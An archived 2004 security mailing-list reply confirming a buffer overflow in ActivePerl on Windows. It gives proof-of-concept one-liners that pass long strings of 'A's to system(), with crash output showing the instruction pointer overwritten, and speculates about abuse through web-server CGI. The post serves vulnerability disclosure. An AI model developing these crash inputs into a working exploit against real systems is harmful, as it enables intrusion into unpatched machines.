[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] Re: Buffer Overflow in ActivePerl ?
- To: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] Re: Buffer Overflow in ActivePerl ?
- From: Nick FitzGerald <nick@xxxxxxxxxxxxxxxxxxx>
- Date: Wed, 19 May 2004 01:29:41 +1200
"Oliver@xxxxxxxxxx" <Oliver@xxxxxxxxxx> wrote:
> i played around with ActiveState's ActivePerl for Win32, and crashed
> Perl.exe with the following command:
>
> perl -e "$a="A" x 256; system($a)"
Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus
all but last week's security patch:
perl -e "$a="A" x 256; system($a)"
perl.exe - Application error
Unhandled instruction at "0x77fcc83d" referenced memory at
"0x00657865. The memory could not be "written".
Also, it is likely exploitable -- push up the number of A's a bit:
C:\>perl -e "$a="A" x 259; system($a)"
perl.exe - Application error
Unhandled instruction at "0x77fcc83d" referenced memory at
"0x65004141. The memory could not be "written".
and we seem to get control of EIP. Coincidence? Try yet two more:
C:\>perl -e "$a="A" x 261; system($a)"
perl.exe - Application error
Unhandled instruction at "0x77fcc83d" referenced memory at
"0x41414141. The memory could not be "written".
Looks like full control of EIP...
However, there is not likely to be a privilege escalation here unless
perhaps a script processor on a web server can be cajoled into doing
something with this?? (Not at all familiar with the innards of Windows
web servers and their relationship to their CGI, etc processors...)
--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html